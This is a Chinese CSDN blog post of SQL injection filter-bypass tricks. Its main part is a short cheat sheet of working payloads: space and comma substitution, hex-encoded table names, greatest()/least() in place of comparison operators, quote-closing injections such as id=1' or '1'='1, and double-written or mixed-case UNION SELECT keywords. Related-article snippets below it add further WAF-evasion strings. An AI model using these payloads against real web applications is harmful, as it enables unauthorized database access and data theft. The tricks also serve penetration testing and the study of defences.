SQLbypass技巧

最新推荐文章于 2024-03-23 15:14:28 发布
最新推荐文章于 2024-03-23 15:14:28 发布
阅读量369 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66977568/article/details/126607630
版权

绕过空格(注释符/**/,%a0)

               括号绕过空格 双写

引号绕过(使用十六进制): 

select column_name from information_schema.tables where table_name="users"

select column_name from information_schema.tables where table_name=0x7573657273

逗号绕过(使用from或者offset):

Substr(database(),1,1)  

select substr(database() from 1 for 1);

select mid(database() from 1 for 1);

比较符号(<>)绕过 使用greatest()、least():(前者返回最大值,后者返回最小值)

select*from users where id=1 and ascii(substr(database(),0,1))>64

select*from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

绕过注释符号:#,-- -

通过闭合后面的引号来进行绕过

id=1' union select 1,2,3||'1

id=1' union select 1,2,'3

id=1' where '1'='1

id=1' and '1'='1

id=1' or '1'='1

=绕过 使用like、rlike、reqexp 或者使用<或者>

绕过union,select,where等:

uniounionn:双写绕过union

unionunion

U/**/NION/**/SE/**/LECT/**/user,pwd from user

UniOn:大小写绕过

当比较符号<>被过滤时,也可以用bewteen and进行绕过

Between a and c:返回a和z之间的数据 不包括z

详见sql注入自动化脚本编写

Throb891
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
23-5 绕过去除 union 和 select 的 SQL 注入
weixin_43263566的博客
02-07 740
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
我的WafBypass之路(SQL注入篇)
07-11
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass(这里只讲主流waf的黑盒测试)
一文读懂sql注入bypass
weixin_46622976的博客
07-12 198
SQL注入bypass
sqlbypass
最新发布
2302_79885863的博客
03-23 1020
Locate(str1,str2,pos)返回str1字符串在str2里pos(起始位置)出现的位置,没有返回0pos必须大于第一次出现的位置,才能显示第二次出现的位置。后面的参数3不是说,后面找的时候第一参数变成1,只是说在这个字符串中,他会从第三位往后找,返回的还是原来字符串的位置,而且返回是子字符串第一个字符的位置。Locate(str1,str2)返回str1字符串在str2里第一次出现的位置,没有返回0。参数1的长度无法满足参数二的长度时,参数3才会执行,满足就输出参数1对应参数2的长度。
openGauss内核分析(七):SQL by pass & 经典执行器 (一)
gallopingdb的博客
07-27 57
这种查询的特征是只涉及单表和简单表达式的查询,因此为了加速这类查询,openGauss提出了SQL by pass框架,在parse层对这类查询做简单的模式判别后,进入到特殊的执行路径里,跳过经典的执行器执行框架,包括算子的初始化与执行、表达式与投影等经典框架,直接重写一套简洁的执行路径,并且直接调用存储接口,这样可以大大加速简单查询的执行速度。c3列修改的值可以是常量和参数,也可以是一个简单的表达式,c1和c2列为索引列,后边可以是常量或者参数。提供的数据读写接口,实现对数据进行计算得到查询的结果集。
【WAF剖析】——sql注入之bypass深度剖析
Demo不是emo的博客
09-05 9676
本文分享了我自己总结的常规sql注入常规操作步骤,足够在日常sql渗透测试时使用,会不定期更新内容。
sql注入利用union来绕过括号过滤
plant1234的博客
04-02 7605
union盲注 当我们在括号被过滤的时候,就不能使用sub(),mid()等多种函数 于是相等union 要想知道uinon的怎么进行盲注,就要了解union 这个给大家看几个mysql的查询语句: 通过这三条语句我们可以看到,我们我利用union将一条数据:1,2,0x69 与查询出来的数据进行降序排序,在排序过程中可以看出用的是ascii码 进行的排序。当我们给的password的ascii值大于admin用户密码的ascii值时,则第一条数据就是我们给的数据。所有就可以判断password的值为
2-4 【实验】11-双写绕过+代码审计
山兔的博客
03-23 1377
今天我们讲的是pass-10,我们用到的思路和我们之前讲sql注入,用到的思路是一样的,我们回想一下之前我们用到的思路 过滤union select,后台做了个单词的替换,将我们的union替换为空,或者替换为其它的一些特殊的字符,这个时候,我们在后台语句的执行中,因为union置换为空,所以产生了语法错误 当时我们有个思路,我们在union中间在加个union uniunionon select 当我们中间这个union被过滤之后,变为空之后,我们这个union就会和前面三个字符,后面两个字符,合并,组
sql注释符注入防御_SQL注入ByPass的一些小技巧
weixin_42395462的博客
12-30 280
SQL注入Bypass技巧注入点识别SQL注入的第一步就是失识别注入点,一般都是在参数后面简单的and 1=1和and 1=2等来判断是否有注入点或者是否有WAF拦截,如果简单的and 1=1这种被WAF拦截了,可以使用如下方法绕过:使用这些字符进行注入点识别:+,-,*,%,/,<>,||,|,&,&&,也可以将and换成or,&&,||等也...
Sql——bypass
Poolhuang的博客
06-16 391
常见手法: ①、大小写绕过、替换绕过/*例如双写*/;(很老的WAF才有用) ②、特殊字符绕过: ③、编码绕过 ④、等价ti
SQL注入(注入姿势和Bypass
2301_79870948的博客
03-20 730
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+
union 联查_union联合查询绕过登录的万能密码解析
weixin_39610488的博客
12-19 1591
—————————asp代码—————————————–username = request.form("username") password = request.form("password") set rs=server.createobject("adodb.recordset") sql = "select[password] from admin where UserName='"&a...
【WAF剖析】——SQL注入之安全狗bypass深度剖析
Demo不是emo的博客
11-23 6774
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
sql注入bypass最新版某狗
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
12-11 648
某狗最新版本
网络安全进阶学习第十三课——SQL注入Bypass姿势
p36273的博客
08-07 1204
string:被填充的字符串,length:返回的字符串长度,pad_string:填充字符串,是个可选参数。2、只过滤一次时,双重关键字绕过,如selselectect,ununionion,oorr等。4、编码绕过:如URLEncode编码,ASCII,HEX,unicode编码绕过。用法与locate类似,返回str1字符串在str2出现的位置,没有则返回0。1、大小写绕过,如User(),dAtaBASE(),SelEct等。%EF%BC%8C这是中文的逗号,大部分不能用,但有些函数可以用。
sql注入之bypass
ymy13326056686的博客
02-02 430
sql注入之bypass
sql注入绕过union select过滤
烟敛寒林的博客
11-09 6148
# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UN...
SQL注入之如何绕过and,union,where,limit过滤绕过
m0_57114395的博客
09-11 2215
当and被过滤时我们可以使用&&进行替换 mysql> select * from fristtb where id= 1 and sex=0x01; +----+------------+---------------------+ | id | sex | birthday | +----+------------+---------------------+ | 1 | 0x01 | 2001-01-20 00:00:00 |
SQL-Bypass安全狗4.0
weixin_45716091的博客
10-21 413
实验环境: sqli-labs 网站安全狗Linux-Apache版 版本:V2.3.18809 CentOS7+宝塔面板 apache+php+mysql 注意: 安全狗需要开启记录并拦截,否则只会记录不会拦截,没有弹窗。 这里以sqli-labs的Less-1为例。 判断注入 存在字符型注入。如果没有错误回显,可以输入payload:?id=2-1 等等来判断。 Fuzz: 1' --+- 未拦截(不拦截注释符) 1' and '1'='1 拦截 1' and 1=1 .

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值